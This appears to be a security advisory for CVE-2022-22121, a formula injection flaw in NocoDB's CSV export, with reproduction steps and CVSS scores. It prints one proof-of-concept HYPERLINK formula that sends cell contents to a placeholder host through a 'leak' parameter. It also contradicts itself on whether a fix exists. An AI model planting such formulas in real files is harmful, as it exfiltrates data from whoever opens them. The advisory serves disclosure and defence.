
We found results for “”
CVE-2022-22121
Date: January 10, 2022
Overview
In NocoDB, versions 0.81.0 through 0.83.8 are affected by CSV Injection vulnerability (Formula Injection). A low privileged attacker can create a new table to inject payloads in the table rows. When an administrator accesses the User Management endpoint and exports the data as a CSV file and opens it, the payload gets executed.Details
NocoDB download as CSV functionality fails to sanitize user-controlled input before writing it to the downloaded CSV file which leads to a formula injection vulnerability.PoC Details
Sign in to the NocoDB application and create a new table, using a lower privileged user like editor, create a new row on this table with value set to the formula injection payload shown below. Then click download as CSV which leads to the formula injection vulnerability be triggered.PoC Code
=HYPERLINK("http://0.0.0.0:8000/?leak="&A1,"click")
Affected Environments
0.81.0 through 0.83.8Prevention
Update to version 0.84.0 or laterLanguage: VUE
Good to know:



Upgrade Version
No fix version available
Base Score: |
|
---|---|
Attack Vector (AV): | Network |
Attack Complexity (AC): | Low |
Privileges Required (PR): | Low |
User Interaction (UI): | Required |
Scope (S): | Unchanged |
Confidentiality (C): | High |
Integrity (I): | High |
Availability (A): | High |
Base Score: |
|
---|---|
Access Vector (AV): | Network |
Access Complexity (AC): | Medium |
Authentication (AU): | Single |
Confidentiality (C): | Partial |
Integrity (I): | Partial |
Availability (A): | Partial |
Additional information: |